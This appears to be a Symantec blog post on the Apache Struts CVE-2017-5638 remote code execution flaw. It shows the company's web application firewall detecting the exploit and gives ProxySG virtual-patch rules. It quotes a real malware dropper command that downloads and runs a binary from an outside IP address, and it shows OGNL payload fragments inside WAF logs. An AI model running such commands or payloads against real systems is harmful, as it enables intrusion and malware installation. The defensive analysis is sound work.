Summary
Apache Struts is a popular open-source MVC web application framework for Java-based web applications. A recently announced 0-day security vulnerability (CVE-2017-5638) against this framework is being actively exploited. It impacts the Jakarta-based multipart parser used in Struts 2.
Exploitation attempting to land remote code execution and command injection payloads have been identified.
The Symantec Web Application Firewall solution leverages a unique Content Nature Detection approach that is able to correctly identify CVE-2017-5638 attacks without requiring a signature update or virtual patch. Symantec Web Application Firewall (WAF) customers are protected by default, and no additional action is required.
Attack
There are many POC attack payloads flooding the web, including this exploit in the Metasploit Framework: https://github.com/rapid7/metasploit-framework/issues/8064 . For our analysis we will use the python script from the core of this exploit. When running the script against a vulnerable target:
… the Wireshark packet capture shows the HTTP request being issued:
The response from the vulnerable server contains the result of running the command as it would run on local host. Command injection chaining allows for truly powerful exploitation variants, from a simple "whoami" and "ls –l" sequences to sophisticated firewall and IDS disabling as shown here.
Mitigation
Let’s deploy the Symantec Web Application Firewall (WAF) and observe how the attack is correctly detected and blocked. With the Symantec WAF deployed in front of the vulnerable Struts server, the following response is returned:
urllib2.HTTPError: HTTP Error 400: Bad Request
Note: The WAF configured by default to return Status 400 for blocked requests.
The WAF log for the request shows the Code Injection and Analytics Filter engines have identified the attack:
"Code Injection;Command Injection""[{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"},
{"eng":"analytics_filter","part":"header","rule":[“AF-1006-3","AF-1006-20","AF-1006-21","AF-1006-52"],"data":"%{(#_='multipart…"}]"The important aspect is that the Symantec WAF detected and blocked this attack without requiring a signature update. The log shows that our WAF correctly detects the value of Content-Type header as malicious and categorizes it as Code Injection and Command Injection. Now if the attacker wants to gain a foothold on the compromised machine they might try a more elaborate Command Injection. For example, this nasty payload from recently discovered Linux ARM ELF_IMEIJ.A malware:
wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1;
This attack is quite unique as it includes a Java code in addition to bash command sequence. Despite the payload modification, the Command Injection attack is detected correctly:
"Command Injection;Code Injection" 40 - "[{"eng":"injection.command","part":"header","host":"linux","version":"3","data":"%{(#_='multipart…#cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.command","part":"header","host":"osx","version":"3","data":"%{(#_='multipart…cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.code","part":"header","lang":"php","data":"%{(#_='multipart…"},
{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"}]" - - WAF_SCANNEDSYMC WAF Protection
The Symantec Web Application Firewall uses Content Nature Detection engines, which satisfy the need for strong detection capabilities in a scalable system capable of handling Enterprise-grade traffic profiles. It is a fundamental shift away from "known bad" pattern matching, and is instead based on understanding the nature of the content and how backend infrastructure components handle data.
Detecting and blocking well-known attacks is something that all modern WAFs do fairly well. Unfortunately this does not represent the real-world exploit payloads from a sophisticated attacker. There are a continually evolving set of evasion techniques exposing fundamental processing holes in existing WAF technology.
The Symantec WAF addresses inherent flaws in the traditional signature-based pattern matching approach. The payloads for CVE-2017-5683 are blocked by default, without requiring a signature update or virtual patch. This greatly reduces the operational overhead associated with type of vulnerability. Symantec WAF customers were also protected before this vulnerability was publically disclosed.
Conclusion
Systems leveraging the Jakarta-based multipart parser used in Apache Struts 2 are advised to update to v2.3.32+ or v2.5.10.1+.
Symantec WAF customers are protected by default, and do not require a signature update or virtual patch for protection.
Existing ProxySG customers who are not running WAF controls can deploy a virtual patch in policy for immediate protection. For example:
; ProxySG 6.5.x<proxy>
request.header.Content-Type.substring="%{(#" force_exception(invalid_request)
; ProxySG 6.6+
<proxy>
http.request.normalization.default("urlDecode:(path),urlDecode:(header),urlDecode:urlDecode:htmlEntityDecode:(arg_name,arg)")<proxy>
http.request[header].substring="%{(#" force_exception(invalid_request)